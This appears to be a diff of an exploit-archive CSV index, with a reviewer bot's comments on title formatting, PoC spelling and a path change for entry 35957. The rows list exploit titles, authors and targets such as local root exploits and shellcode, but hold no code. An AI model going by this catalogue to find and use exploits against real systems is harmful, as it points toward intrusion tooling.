19448,platforms/windows/remote/19448.c,"ToxSoft NextFTP 1.82 - Buffer Overflow",1999-08-03,UNYUN,windows,remote,0
19449,platforms/windows/remote/19449.c,"Fujitsu Chocoa 1.0 beta7R - 'Topic' Buffer Overflow",1999-08-03,UNYUN,windows,remote,0
19450,platforms/windows/remote/19450.c,"CREAR ALMail32 1.10 - Buffer Overflow",1999-08-08,UNYUN,windows,remote,0
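Review bot: the new description for id 19447 is missing a space after the second separator ("OpenBSD <= 2.5 /Solaris <= 7.0"). Suggest "NetBSD <= 1.4 / OpenBSD <= 2.5 / Solaris <= 7.0 - profil(2) Exploit" so the separators match the other lines changed in this commit.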
@ -17254,7 +17254,7 @@ id,file,description,date,author,platform,type,port
19893,platforms/windows/remote/19893.c,"L-Soft Listserv 1.8 Web Archives Buffer Overflow",2000-05-01,"David Litchfield",windows,remote,0
19894,platforms/windows/local/19894.txt,"Aladdin Knowledge Systems eToken 3.3.3 eToken PIN Extraction",2000-05-04,kingpin,windows,local,0
19895,platforms/windows/remote/19895.txt,"NetWin DNews 5.3 Server Buffer Overflow",2000-03-01,Joey__,windows,remote,0
19896,platforms/bsd/dos/19896.c,"FreeBSD 3.4/4.0/5.0_NetBSD 1.4 Unaligned IP Option Denial of Service",2000-05-04,y3t1,bsd,dos,0
19896,platforms/bsd/dos/19896.c,"FreeBSD 3.4/4.0/5.0 / NetBSD 1.4 - Unaligned IP Option Denial of Service",2000-05-04,y3t1,bsd,dos,0
19897,platforms/windows/remote/19897.txt,"FrontPage 2000_IIS 4.0/5.0 Server Extensions Path Disclosure",2000-05-06,"Frankie Zie",windows,remote,0
19898,platforms/php/webapps/19898.txt,"Forum Oxalis <= 0.1.2 - SQL Injection",2012-07-17,"Jean Pascal Pereira",php,webapps,0
19899,platforms/cgi/dos/19899.txt,"UltraBoard 1.6 DoS",2000-05-05,"Juan M. Bello Rivas",cgi,dos,0
@ -18039,7 +18039,7 @@ id,file,description,date,author,platform,type,port
20728,platforms/windows/dos/20728.txt,"602Pro Lan Suite 2000a - Long HTTP Request Denial of Service",2001-04-05,nitr0s,windows,dos,0
20729,platforms/php/webapps/20729.txt,"PHP-Nuke 1.0/2.5/3.0/4.x - Remote Ad Banner URL Change",2001-04-02,"Juan Diego",php,webapps,0
20730,platforms/unix/remote/20730.c,"IPFilter 3.x Fragment Rule Bypass",2001-04-09,"Thomas Lopatic",unix,remote,0
20731,platforms/bsd/remote/20731.c,"FreeBSD 2.2-4.2_NetBSD 1.2-4.5_OpenBSD 2.x ftpd glob() Buffer Overflow",2001-04-14,"fish stiqz",bsd,remote,0
20731,platforms/bsd/remote/20731.c,"FreeBSD 2.2-4.2 / NetBSD 1.2-4.5 / OpenBSD 2.x FTPd - glob() Buffer Overflow",2001-04-14,"fish stiqz",bsd,remote,0
20732,platforms/freebsd/remote/20732.pl,"freebsd 4.2-stable ftpd glob() Buffer Overflow Vulnerabilities",2001-04-16,"Elias Levy",freebsd,remote,0
20733,platforms/openbsd/remote/20733.c,"OpenBSD 2.x-2.8 ftpd glob() Buffer Overflow",2001-04-16,"Elias Levy",openbsd,remote,0
20734,platforms/hardware/dos/20734.sh,"Cisco PIX 4.x/5.x TACACS+ - Denial of Service",2001-04-06,"Claudiu Calomfirescu",hardware,dos,0
@ -18641,7 +18641,7 @@ id,file,description,date,author,platform,type,port
21361,platforms/windows/remote/21361.txt,"Microsoft Internet Explorer 5 Cascading Style Sheet File Disclosure",2002-04-02,"GreyMagic Software",windows,remote,0
21362,platforms/linux/local/21362.c,"Oracle 8i TNS Listener Local Command Parameter Buffer Overflow",2002-04-01,"the itch",linux,local,0
21363,platforms/unix/remote/21363.c,"Icecast 1.x AVLLib Buffer Overflow",2002-02-16,dizznutt,unix,remote,0
21364,platforms/netbsd_x86/remote/21364.txt,"NetBSD 1.x TalkD User Validation",2002-04-03,"Tekno pHReak",netbsd_x86,remote,0
21364,platforms/netbsd_x86/remote/21364.txt,"NetBSD 1.x TalkD - User Validation",2002-04-03,"Tekno pHReak",netbsd_x86,remote,0
21365,platforms/linux/remote/21365.txt,"PHPGroupWare 0.9.13 Debian Package Configuration",2002-04-03,"Matthias Jordan",linux,remote,0
21366,platforms/windows/dos/21366.txt,"Microsoft Internet Explorer 5/6_Outlook 2000/2002/5.5_Word 2000/2002 VBScript ActiveX Word Object DoS",2002-04-08,"Elia Florio",windows,dos,0
21367,platforms/windows/remote/21367.txt,"Abyss Web Server 1.0 File Disclosure",2002-04-07,"Jeremy Roberts",windows,remote,0
@ -18943,7 +18943,7 @@ id,file,description,date,author,platform,type,port
21666,platforms/linux/local/21666.txt,"soapbox <= 0.3.1 - Local Root Exploit",2012-10-02,"Jean Pascal Pereira",linux,local,0
21667,platforms/linux/local/21667.c,"MM 1.0.x/1.1.x - Shared Memory Library Temporary File Privilege Escalation",2002-07-29,"Sebastian Krahmer",linux,local,0
21668,platforms/php/webapps/21668.txt,"ShoutBox 1.2 Form Field HTML Injection",2002-07-29,delusion,php,webapps,0
21669,platforms/bsd/local/21669.pl,"FreeBSD 4.x_NetBSD 1.4.x/1.5.x/1.6_OpenBSD 3 pppd Arbitrary File Permission Modification Race Condition",2002-07-29,"Sebastian Krahmer",bsd,local,0
21669,platforms/bsd/local/21669.pl,"FreeBSD 4.x / NetBSD 1.4.x/1.5.x/1.6 / OpenBSD 3 - pppd Arbitrary File Permission Modification Race Condition",2002-07-29,"Sebastian Krahmer",bsd,local,0
21670,platforms/windows/remote/21670.txt,"Microsoft Windows Media Player 6/7 Filename Buffer Overflow",2002-07-30,ken@FTU,windows,remote,0
21671,platforms/unix/remote/21671.c,"OpenSSL SSLv2 - Malformed Client Key Remote Buffer Overflow (1)",2002-07-30,spabam,unix,remote,0
21672,platforms/unix/remote/21672.c,"OpenSSL SSLv2 - Malformed Client Key Remote Buffer Overflow (2)",2002-07-30,spabam,unix,remote,0
@ -20079,7 +20079,7 @@ id,file,description,date,author,platform,type,port
22837,platforms/windows/remote/22837.c,"Microsoft Windows 2000/NT 4 Media Services NSIISlog.DLL Remote Buffer Overflow",2003-06-25,firew0rker,windows,remote,0
22838,platforms/windows/remote/22838.txt,"BRS WebWeaver 1.0 Error Page Cross-Site Scripting",2003-06-26,"Carsten H. Eiram",windows,remote,0
22839,platforms/linux/dos/22839.c,"methane IRCd 0.1.1 - Remote Format String",2003-06-27,Dinos,linux,dos,0
22840,platforms/linux/local/22840.c,"Linux Kernel 2.4 - execve() System Call Race Condition PoC",2003-06-26,IhaQueR,linux,local,0
22840,platforms/linux/local/22840.c,"Linux Kernel 2.4 - suid execve() System Call Race Condition PoC",2003-06-26,IhaQueR,linux,local,0
22841,platforms/php/webapps/22841.txt,"iXmail 0.2/0.3 iXmail_NetAttach.php File Deletion",2003-06-26,leseulfrog,php,webapps,0
22842,platforms/php/webapps/22842.txt,"CutePHP CuteNews 1.3 HTML Injection",2003-06-29,"Peter Winter-Smith",php,webapps,0
22843,platforms/cgi/webapps/22843.txt,"MegaBook 1.1/2.0/2.1 - Multiple HTML Injection Vulnerabilities",2003-06-29,"Morning Wood",cgi,webapps,0
@ -22427,7 +22427,7 @@ id,file,description,date,author,platform,type,port
25284,platforms/php/webapps/25284.txt,"Nuke Bookmarks 0.6 Marks.php SQL Injection",2005-03-26,"Gerardo Astharot Di Giacomo",php,webapps,0
25285,platforms/php/webapps/25285.txt,"MagicScripts E-Store Kit-2 PayPal Edition Cross-Site Scripting",2005-03-26,Dcrab,php,webapps,0
25286,platforms/php/webapps/25286.txt,"MagicScripts E-Store Kit-2 PayPal Edition Remote File Include",2005-03-26,Dcrab,php,webapps,0
25287,platforms/linux/local/25287.c,"Linux Kernel 2.4.x / 2.6.x - Bluetooth Signed Buffer Index PoC (1)",2005-03-28,"ilja van sprundel",linux,local,0
25287,platforms/linux/local/25287.c,"Linux Kernel 2.4.x / 2.6.x - Bluetooth Signed Buffer Index (Proof of Concept) (1)",2005-03-28,"ilja van sprundel",linux,local,0
25288,platforms/linux/local/25288.c,"Linux Kernel 2.4.x / 2.6.x - Bluetooth Signed Buffer Index Local Root (2)",2005-04-08,qobaiashi,linux,local,0
25289,platforms/linux/local/25289.c,"Linux Kernel <= 2.4.30 / <= 2.6.11.5 - Bluetooth bluez_sock_create Local Root",2005-10-19,backdoored.net,linux,local,0
25291,platforms/multiple/remote/25291.txt,"Tincat Network Library Remote Buffer Overflow",2005-03-28,"Luigi Auriemma",multiple,remote,0
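Review bot: the 25287 title expands "PoC" to "(Proof of Concept)" while the other rows touched in this commit keep the short form ("Linux Kernel 2.4 - suid execve() System Call Race Condition PoC" for 22840 above, "Crash PoC" for 35935 and 38072 below), so the index now carries both spellings for the same thing; pick one form and apply it to all rows in this change rather than converting a single entry.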
@ -23275,7 +23275,7 @@ id,file,description,date,author,platform,type,port
26128,platforms/osx/dos/26128.html,"Apple Safari 1.3 Web Browser JavaScript Invalid Address Denial of Service",2005-08-09,"Patrick Webster",osx,dos,0
26129,platforms/hardware/webapps/26129.txt,"Buffalo WZR-HP-G300NH2 - CSRF",2013-06-11,"Prayas Kulshrestha",hardware,webapps,0
26130,platforms/windows/dos/26130.py,"WinRadius 2.11 - Denial of Service",2013-06-11,npn,windows,dos,0
26131,platforms/linux/local/26131.c,"Linux Kernel < 3.8.9 (x86_64) - perf_swevent_init Local Root Exploit (2)",2013-06-11,"Andrea Bittau",linux,local,0
26131,platforms/linux/local/26131.c,"Linux Kernel < 3.8.9 (x86_64) - 'perf_swevent_init' Local Root Exploit (2)",2013-06-11,"Andrea Bittau",linux,local,0
26132,platforms/php/webapps/26132.txt,"Fobuc Guestbook 0.9 - SQL Injection",2013-06-11,"CWH Underground",php,webapps,0
26133,platforms/windows/dos/26133.py,"Sami FTP Server 2.0.1 - RETR Denial of Service",2013-06-11,Chako,windows,dos,21
26134,platforms/windows/remote/26134.rb,"Synactis PDF In-The-Box ConnectToSynactic Stack Buffer Overflow",2013-06-11,Metasploit,windows,remote,0
@ -26233,7 +26233,7 @@ id,file,description,date,author,platform,type,port
29201,platforms/osx/local/29201.c,"Apple Mac OS X 10.4.x - Shared_Region_Make_Private_Np Kernel Function Local Memory Corruption",2006-11-29,LMH,osx,local,0
29202,platforms/php/webapps/29202.txt,"Seditio1.10 /Land Down 8.0 Under Polls.php SQL Injection",2006-11-30,ajann,php,webapps,0
29203,platforms/php/webapps/29203.php,"Woltlab Burning Board 2.3.x Register.php Cross-Site Scripting",2006-11-30,blueshisha,php,webapps,0
29204,platforms/netbsd_x86/dos/29204.pl,"NetBSD 3.1 Ftpd and Tnftpd Port Remote Buffer Overflow",2006-12-01,kcope,netbsd_x86,dos,0
29204,platforms/netbsd_x86/dos/29204.pl,"NetBSD 3.1 FTPd / Tnftpd - Port Remote Buffer Overflow",2006-12-01,kcope,netbsd_x86,dos,0
29205,platforms/php/webapps/29205.txt,"Invision Gallery 2.0.7 Index.php IMG Parameter SQL Injection",2006-12-01,infection,php,webapps,0
29262,platforms/hardware/webapps/29262.pl,"Pirelli Discus DRG A125g - Password Disclosure",2013-10-28,"Sebastián Magof",hardware,webapps,0
29207,platforms/php/webapps/29207.txt,"DZCP (deV!L_z Clanportal) 1.3.6 - Show Parameter SQL Injection",2006-12-01,"Tim Weber",php,webapps,0
@ -30064,7 +30064,7 @@ id,file,description,date,author,platform,type,port
33314,platforms/linux/dos/33314.html,"Mozilla Firefox <= 3.0.14 - Remote Memory Corruption",2009-10-27,"Carsten Book",linux,dos,0
33315,platforms/linux/remote/33315.java,"Sun Java SE November 2009 - Multiple Security Vulnerabilities (1)",2009-10-29,Tometzky,linux,remote,0
33316,platforms/multiple/remote/33316.java,"Sun Java SE November 2009 - Multiple Security Vulnerabilities (2)",2009-10-29,Tometzky,multiple,remote,0
33318,platforms/bsd/dos/33318.txt,"OpenBSD 4.6 and NetBSD 5.0.1 - 'printf(1)' Format String Parsing Denial of Service",2009-10-30,"Maksymilian Arciemowicz",bsd,dos,0
33318,platforms/bsd/dos/33318.txt,"OpenBSD 4.6 / NetBSD 5.0.1 - 'printf(1)' Format String Parsing Denial of Service",2009-10-30,"Maksymilian Arciemowicz",bsd,dos,0
33319,platforms/bsd/dos/33319.txt,"Multiple BSD Distributions 'printf(3)' Memory Corruption",2009-10-30,"Maksymilian Arciemowicz",bsd,dos,0
33320,platforms/php/webapps/33320.txt,"TFTgallery 0.13 - 'sample' Parameter Cross-Site Scripting",2009-11-02,blake,php,webapps,0
33321,platforms/linux/local/33321.c,"Linux Kernel 2.6.x (2.6.0 <= 2.6.31) - 'pipe.c' Local Privilege Escalation (1)",2009-11-03,"teach & xipe",linux,local,0
@ -30218,7 +30218,7 @@ id,file,description,date,author,platform,type,port
33574,platforms/php/webapps/33574.txt,"Discuz! 6.0 - 'tid' Parameter Cross-Site Scripting",2010-01-27,s4r4d0,php,webapps,0
33575,platforms/cfm/webapps/33575.txt,"CommonSpot Server 'utilities/longproc.cfm' Cross-Site Scripting",2010-01-28,"Richard Brain",cfm,webapps,0
33576,platforms/linux/local/33576.txt,"Battery Life Toolkit 1.0.9 - 'bltk_sudo' Local Privilege Escalation",2010-01-28,"Matthew Garrett",linux,local,0
33589,platforms/linux/local/33589.c,"Linux Kernel <= 3.2.0-23 / <= 3.5.0-23 (Ubuntu 12.04.0/1/2 x64) - perf_swevent_init Local Root Exploit (3)",2014-05-31,"Vitaly Nikolenko",linux,local,0
33589,platforms/linux/local/33589.c,"Linux Kernel <= 3.2.0-23 / <= 3.5.0-23 (Ubuntu 12.04/12.04.1/12.04.2 x64) - 'perf_swevent_init' Local Root Exploit (3)",2014-05-31,"Vitaly Nikolenko",linux,local,0
33523,platforms/linux/local/33523.c,"Linux Kernel < 2.6.28 - 'fasync_helper()' Local Privilege Escalation",2009-12-16,"Tavis Ormandy",linux,local,0
33524,platforms/linux/dos/33524.txt,"OpenOffice 3.1 - (.csv) Remote Denial of Service",2010-01-14,"Hellcode Research",linux,dos,0
33525,platforms/php/remote/33525.txt,"Zend Framework <= 1.9.6 - Multiple Input Validation Vulnerabilities / Security Bypass Weakness",2010-01-14,"draic Brady",php,remote,0
@ -31418,7 +31418,7 @@ id,file,description,date,author,platform,type,port
34877,platforms/php/webapps/34877.txt,"DigiOz Guestbook 1.7.2 - 'search.php' Cross-Site Scripting",2009-08-26,Moudi,php,webapps,0
34878,platforms/php/webapps/34878.txt,"StandAloneArcade 1.1 - 'gamelist.php' Cross-Site Scripting",2009-08-27,Moudi,php,webapps,0
34879,platforms/linux/remote/34879.txt,"OpenVPN 2.2.29 - Remote Exploit (Shellshock)",2014-10-04,"hobbily plunt",linux,remote,0
34881,platforms/linux/remote/34881.html,"Mozilla Firefox SeaMonkey <= 3.6.10 and Thunderbird <= 3.1.4 - 'document.write' Memory Corruption",2010-10-19,"Alexander Miller",linux,remote,0
34881,platforms/linux/remote/34881.html,"Mozilla Firefox SeaMonkey <= 3.6.10 / Thunderbird <= 3.1.4 - 'document.write' Memory Corruption",2010-10-19,"Alexander Miller",linux,remote,0
34882,platforms/php/webapps/34882.html,"sNews 1.7 - 'snews.php' Cross-Site Scripting and HTML Injection Vulnerabilities",2010-10-19,"High-Tech Bridge SA",php,webapps,0
34883,platforms/php/webapps/34883.txt,"4Site CMS 2.6 - 'cat' Parameter SQL Injection",2010-10-19,"High-Tech Bridge SA",php,webapps,0
34884,platforms/php/webapps/34884.txt,"JCE-Tech SearchFeed Script 'index.php' Cross-Site Scripting",2009-08-26,Moudi,php,webapps,0
@ -31618,7 +31618,7 @@ id,file,description,date,author,platform,type,port
35092,platforms/multiple/remote/35092.html,"Helix Server 14.0.1.571 Administration Interface Cross-Site Request Forgery",2010-12-10,"John Leitch",multiple,remote,0
35093,platforms/cgi/webapps/35093.txt,"BizDir 05.10 - 'f_srch' Parameter Cross-Site Scripting",2010-12-10,"Aliaksandr Hartsuyeu",cgi,webapps,0
35094,platforms/php/webapps/35094.txt,"slickMsg 0.7-alpha 'top.php' Cross-Site Scripting",2010-12-10,"Aliaksandr Hartsuyeu",php,webapps,0
35095,platforms/linux/remote/35095.txt,"Mozilla Firefox/Thunderbird/SeaMonkey Multiple HTML Injection Vulnerabilities",2010-12-09,"Yosuke Hasegawa",linux,remote,0
35095,platforms/linux/remote/35095.txt,"Mozilla Firefox/Thunderbird/SeaMonkey - Multiple HTML Injection Vulnerabilities",2010-12-09,"Yosuke Hasegawa",linux,remote,0
35096,platforms/php/webapps/35096.txt,"Joomla! 'com_mailto' Component Multiple Cross-Site Scripting Vulnerabilities",2010-12-10,MustLive,php,webapps,0
35097,platforms/php/webapps/35097.txt,"Joomla Redirect Component 1.5.19 - 'com_redirect' Local File Include",2010-12-13,jos_ali_joe,php,webapps,0
35098,platforms/php/webapps/35098.txt,"Enalean Tuleap 7.4.99.5 - Blind SQL Injection",2014-10-28,Portcullis,php,webapps,80
@ -31867,7 +31867,7 @@ id,file,description,date,author,platform,type,port
35366,platforms/multiple/remote/35366.txt,"IBM Lotus Sametime stconf.nsf XSS",2011-02-21,"Dave Daly",multiple,remote,0
35367,platforms/php/webapps/35367.txt,"crea8social 1.3 - Stored XSS",2014-11-25,"Halil Dalabasmaz",php,webapps,80
35369,platforms/multiple/dos/35369.txt,"Battlefield 2/2142 Malformed Packet NULL Pointer Dereference Remote Denial Of Service",2011-02-22,"Luigi Auriemma",multiple,dos,0
35370,platforms/linux/local/35370.c,"Linux Kernel <= 3.14.5 (RHEL/CentOS 7) - libfutex Local Root",2014-11-25,"Kaiqu Chen",linux,local,0
35370,platforms/linux/local/35370.c,"Linux Kernel <= 3.14.5 (RHEL / CentOS 7) - 'libfutex' Local Root Exploit",2014-11-25,"Kaiqu Chen",linux,local,0
35371,platforms/php/webapps/35371.txt,"WordPress Google Document Embedder 2.5.14 - SQL Injection",2014-11-25,"Kacper Szurek",php,webapps,80
35372,platforms/hardware/webapps/35372.rb,"Arris VAP2500 - Authentication Bypass",2014-11-25,HeadlessZeke,hardware,webapps,80
35373,platforms/php/webapps/35373.txt,"WordPress GD Star Rating Plugin 1.9.7 - 'wpfn' Parameter Cross-Site Scripting",2011-02-22,"High-Tech Bridge SA",php,webapps,0
@ -32384,7 +32384,7 @@ id,file,description,date,author,platform,type,port
35916,platforms/php/webapps/35916.txt,"WordPress Photo Gallery Plugin 1.2.5 - Unrestricted File Upload",2014-11-11,"Kacper Szurek",php,webapps,80
35917,platforms/hardware/remote/35917.txt,"D-Link DSL-2740R - Unauthenticated Remote DNS Change Exploit",2015-01-27,"Todor Donev",hardware,remote,0
35918,platforms/multiple/remote/35918.c,"IBM DB2 - 'DT_RPATH' Insecure Library Loading Arbitrary Code Execution",2011-06-30,"Tim Brown",multiple,remote,0
35919,platforms/bsd/remote/35919.c,"NetBSD 5.1 Multiple 'libc/net' Functions Stack Buffer Overflow",2011-07-01,"Maksymilian Arciemowicz",bsd,remote,0
35919,platforms/bsd/remote/35919.c,"NetBSD 5.1 - Multiple 'libc/net' Functions Stack Buffer Overflow",2011-07-01,"Maksymilian Arciemowicz",bsd,remote,0
35920,platforms/php/webapps/35920.txt,"WebCalendar 1.2.3 Multiple Cross Site Scripting Vulnerabilities",2011-07-04,"Stefan Schurtz",php,webapps,0
35921,platforms/windows/remote/35921.html,"iMesh 10.0 - 'IMWebControl.dll' ActiveX Control Buffer Overflow",2011-07-04,KedAns-Dz,windows,remote,0
35922,platforms/php/webapps/35922.txt,"Joomla! 'com_jr_tfb' Component 'controller' Parameter Local File Include",2011-07-05,FL0RiX,php,webapps,0
@ -32397,7 +32397,7 @@ id,file,description,date,author,platform,type,port
35929,platforms/php/webapps/35929.txt,"Joomla! 'com_voj' Component SQL Injection",2011-07-08,CoBRa_21,php,webapps,0
35930,platforms/php/webapps/35930.txt,"Prontus CMS 'page' Parameter Cross Site Scripting",2011-07-11,Zerial,php,webapps,0
35931,platforms/php/webapps/35931.txt,"ICMusic '1.2 music_id' Parameter SQL Injection",2011-07-11,kaMtiEz,php,webapps,0
35932,platforms/hardware/remote/35932.c,"VSAT Sailor 900 - Remote Exploit",2015-01-29,"Nicholas Lemonias.",hardware,remote,0
35932,platforms/hardware/remote/35932.c,"VSAT Sailor 900 - Remote Exploit",2015-01-29,"Nicholas Lemonias",hardware,remote,0
35933,platforms/hardware/webapps/35933.txt,"ManageEngine Firewall Analyzer 8.0 - Directory Traversal/XSS Vulnerabilities",2015-01-29,"Sepahan TelCom IT Group",hardware,webapps,0
35934,platforms/osx/local/35934.txt,"OS X < 10.10.x - Gatekeeper bypass",2015-01-29,"Amplia Security Research",osx,local,0
35935,platforms/windows/local/35935.py,"UniPDF 1.1 - Crash PoC (SEH overwritten)",2015-01-29,bonze,windows,local,0
@ -32420,7 +32420,7 @@ id,file,description,date,author,platform,type,port
35953,platforms/windows/local/35953.c,"McAfee Data Loss Prevention Endpoint - Arbitrary Write Privilege Escalation",2015-01-30,"Parvez Anwar",windows,local,0
35955,platforms/php/webapps/35955.txt,"Easy Estate Rental 's_location' Parameter SQL Injection",2011-07-15,Lazmania61,php,webapps,0
35956,platforms/php/webapps/35956.txt,"Joomla Foto Component 'id_categoria' Parameter SQL Injection",2011-07-15,SOLVER,php,webapps,0
35957,platforms/linux/local/35957.txt,"Linux Kernel 2.6.26 - Auerswald USB Device Driver Buffer Overflow (Proof of Concept)",2009-10-19,"R. Dominguez Veg",linux,local,0
35957,platforms/linux/dos/35957.txt,"Linux Kernel 2.6.26 - Auerswald USB Device Driver Buffer Overflow (Proof of Concept)",2009-10-19,"R. Dominguez Veg",linux,dos,0
35958,platforms/php/webapps/35958.txt,"Joomla Juicy Gallery Component 'picId' Parameter SQL Injection",2011-07-15,SOLVER,php,webapps,0
35959,platforms/php/webapps/35959.txt,"Joomla! 'com_hospital' Component SQL Injection",2011-07-15,SOLVER,php,webapps,0
35960,platforms/php/webapps/35960.txt,"Joomla Controller Component 'Itemid' Parameter SQL Injection",2011-07-15,SOLVER,php,webapps,0
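Review bot: this row moves entry 35957 from platforms/linux/local/35957.txt to platforms/linux/dos/35957.txt and changes the type column to dos, but the visible part of this commit shows no matching rename of the file itself; confirm the file was moved in the same change, otherwise the CSV points at a path that does not exist and the entry can no longer be fetched by path.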
@ -33104,7 +33104,7 @@ id,file,description,date,author,platform,type,port
36689,platforms/linux/webapps/36689.txt,"BOA Web Server 0.94.8.2 - Arbitrary File Access",2000-12-19,llmora,linux,webapps,0
36690,platforms/linux/remote/36690.rb,"Barracuda Firmware <= 5.0.0.012 - Post Auth Remote Root exploit",2015-04-09,xort,linux,remote,8000
36691,platforms/php/webapps/36691.txt,"WordPress Windows Desktop and iPhone Photo Uploader Plugin Arbitrary File Upload",2015-04-09,"Manish Tanwar",php,webapps,80
36692,platforms/osx/local/36692.py,"Mac OS X < 10.7.5/10.8.2/10.9.5/10.10.2 - rootpipe Local Privilege Escalation",2015-04-09,"Emil Kvarnhammar",osx,local,0
36692,platforms/osx/local/36692.py,"Mac OS X < 10.7.5/10.8.2/10.9.5/10.10.2 - 'rootpipe' Privilege Escalation",2015-04-09,"Emil Kvarnhammar",osx,local,0
36693,platforms/php/webapps/36693.txt,"RabbitWiki 'title' Parameter Cross Site Scripting",2012-02-10,sonyy,php,webapps,0
36694,platforms/php/webapps/36694.txt,"eFront Community++ 3.6.10 SQL Injection and Multiple HTML Injection Vulnerabilities",2012-02-12,"Benjamin Kunz Mejri",php,webapps,0
36695,platforms/php/webapps/36695.txt,"Zimbra 'view' Parameter Cross Site Scripting",2012-02-13,sonyy,php,webapps,0
@ -34349,7 +34349,7 @@ id,file,description,date,author,platform,type,port
38032,platforms/ios/dos/38032.pl,"Viber 4.2.0 - Non-Printable Characters Handling Denial of Service",2015-08-31,"Mohammad Reza Espargham",ios,dos,0
38034,platforms/hardware/webapps/38034.txt,"Cyberoam Firewall CR500iNG-XP - 10.6.2 MR-1 - Blind SQL Injection",2015-08-31,"Dharmendra Kumar Singh",hardware,webapps,0
38035,platforms/windows/local/38035.pl,"Boxoft WAV to MP3 Converter - convert Feature Buffer Overflow",2015-08-31,"Robbie Corley",windows,local,0
38036,platforms/osx/local/38036.rb,"Apple OS X Entitlements Rootpipe Privilege Escalation",2015-08-31,Metasploit,osx,local,0
38036,platforms/osx/local/38036.rb,"Apple OS X Entitlements - 'Rootpipe' Privilege Escalation",2015-08-31,Metasploit,osx,local,0
38037,platforms/php/webapps/38037.html,"Open-Realty 2.5.8 Cross Site Request Forgery",2012-11-16,"Aung Khant",php,webapps,0
38038,platforms/multiple/dos/38038.txt,"Splunk <= 4.3.1 Denial of Service",2012-11-19,"Alexander Klink",multiple,dos,0
38039,platforms/php/webapps/38039.txt,"openSIS 'modname' Parameter Local File Include",2012-11-20,"Julian Horoszkiewicz",php,webapps,0
@ -34378,7 +34378,7 @@ id,file,description,date,author,platform,type,port
38062,platforms/multiple/webapps/38062.txt,"Forescout CounterACT 'a' Parameter Open Redirection",2012-11-26,"Joseph Sheridan",multiple,webapps,0
38063,platforms/php/webapps/38063.txt,"WordPress Wp-ImageZoom Theme 'id' Parameter SQL Injection",2012-11-26,Amirh03in,php,webapps,0
38064,platforms/php/webapps/38064.txt,"WordPress CStar Design 'id' Parameter SQL Injection",2012-11-27,Amirh03in,php,webapps,0
38065,platforms/osx/shellcode/38065.txt,"OS-X/x86-64 - /bin/sh Shellcode - NULL Byte Free (34 bytes)",2015-09-02,"Fitzl Csaba",osx,shellcode,0
38065,platforms/osx/shellcode/38065.txt,"OS-X/x86-64 - /bin/sh Shellcode NULL Byte Free (34 bytes)",2015-09-02,"Fitzl Csaba",osx,shellcode,0
38068,platforms/php/webapps/38068.txt,"MantisBT 1.2.19 - Host Header Attack",2015-09-02,"Pier-Luc Maltais",php,webapps,80
38071,platforms/php/webapps/38071.rb,"YesWiki 0.2 - Path Traversal",2015-09-02,HaHwul,php,webapps,80
38072,platforms/windows/dos/38072.py,"SphereFTP Server 2.0 - Crash PoC",2015-09-02,"Meisam Monsef",windows,dos,21
@ -34402,7 +34402,7 @@ id,file,description,date,author,platform,type,port
38101,platforms/php/webapps/38101.txt,"WordPress Zingiri Forums Plugin 'language' Parameter Local File Include",2012-12-30,Amirh03in,php,webapps,0
38102,platforms/php/webapps/38102.txt,"WordPress Nest Theme 'codigo' Parameter SQL Injection",2012-12-04,"Ashiyane Digital Security Team",php,webapps,0
38103,platforms/php/webapps/38103.txt,"Sourcefabric Newscoop 'f_email' Parameter SQL Injection",2012-12-04,AkaStep,php,webapps,0
38136,platforms/osx/local/38136.txt,"OS X Install.framework suid root Runner Binary Privilege Escalation",2015-09-10,"Google Security Research",osx,local,0
38136,platforms/osx/local/38136.txt,"OS X Install.framework - suid root Runner Binary Privilege Escalation",2015-09-10,"Google Security Research",osx,local,0
38137,platforms/osx/local/38137.txt,"OS X Install.framework Arbitrary mkdir_ unlink and chown to admin Group",2015-09-10,"Google Security Research",osx,local,0
38094,platforms/lin_x86/shellcode/38094.c,"Linux/x86 - Create file with permission 7775 and exit shellcode (Generator)",2015-09-07,"Ajith Kp",lin_x86,shellcode,0
38095,platforms/windows/local/38095.pl,"VeryPDF HTML Converter 2.0 - SEH/ToLower() Bypass Buffer Overflow",2015-09-07,"Robbie Corley",windows,local,0
@ -34735,7 +34735,7 @@ id,file,description,date,author,platform,type,port
38448,platforms/hardware/webapps/38448.txt,"F5 Big-IP 10.2.4 Build 595.0 Hotfix HF3 - File Path Traversal",2015-10-13,"Karn Ganeshen",hardware,webapps,0
38449,platforms/hardware/webapps/38449.txt,"Netgear Voice Gateway 2.3.0.23_2.3.23 - Multiple Vulnerabilities",2015-10-13,"Karn Ganeshen",hardware,webapps,0
38450,platforms/php/webapps/38450.txt,"Kerio Control <= 8.6.1 - Multiple Vulnerabilities",2015-10-13,"Raschin Tavakoli",php,webapps,0
38454,platforms/multiple/remote/38454.py,"Linux/MIPS Kernel 2.6.36 NetUSB - Remote Code Execution Exploit",2015-10-14,blasty,multiple,remote,0
38454,platforms/multiple/remote/38454.py,"Linux/MIPS Kernel 2.6.36 - 'NetUSB' Remote Code Execution Exploit",2015-10-14,blasty,multiple,remote,0
38455,platforms/hardware/webapps/38455.txt,"ZyXEL PMG5318-B20A - OS Command Injection",2015-10-14,"Karn Ganeshen",hardware,webapps,0
38456,platforms/windows/local/38456.py,"Boxoft WAV to MP3 Converter 1.1 - SEH Buffer Overflow",2015-10-14,ArminCyber,windows,local,0
38475,platforms/hardware/dos/38475.txt,"ZHONE < S3.0.501 - Multiple Remote Code Execution Vulnerabilities",2015-10-16,"Lyon Yang",hardware,dos,0
@ -35896,7 +35896,7 @@ id,file,description,date,author,platform,type,port
39968,platforms/windows/webapps/39968.txt,"Gemalto Sentinel License Manager 18.0.1.55505 - Directory Traversal",2016-06-16,LiquidWorm,windows,webapps,1947
39682,platforms/php/webapps/39682.txt,"RockMongo PHP MongoDB Administrator 1.1.8 - Multiple Vulnerabilities",2016-04-11,"Ozer Goker",php,webapps,80
39683,platforms/hardware/webapps/39683.txt,"Axis Network Cameras - Multiple Vulnerabilities",2016-04-11,Orwelllabs,hardware,webapps,80
39684,platforms/lin_x86-64/shellcode/39684.c,"Linux/x86-64 - bindshell (Pori: 5600) shellcode (81 bytes)",2016-04-11,"Ajith Kp",lin_x86-64,shellcode,0
39684,platforms/lin_x86-64/shellcode/39684.c,"Linux/x86-64 - bindshell (Port 5600) shellcode (81 bytes)",2016-04-11,"Ajith Kp",lin_x86-64,shellcode,0
39685,platforms/android/dos/39685.txt,"Android - IOMX getConfig/getParameter Information Disclosure",2016-04-11,"Google Security Research",android,dos,0
39686,platforms/android/dos/39686.txt,"Android - IMemory Native Interface is Insecure for IPC Use",2016-04-11,"Google Security Research",android,dos,0
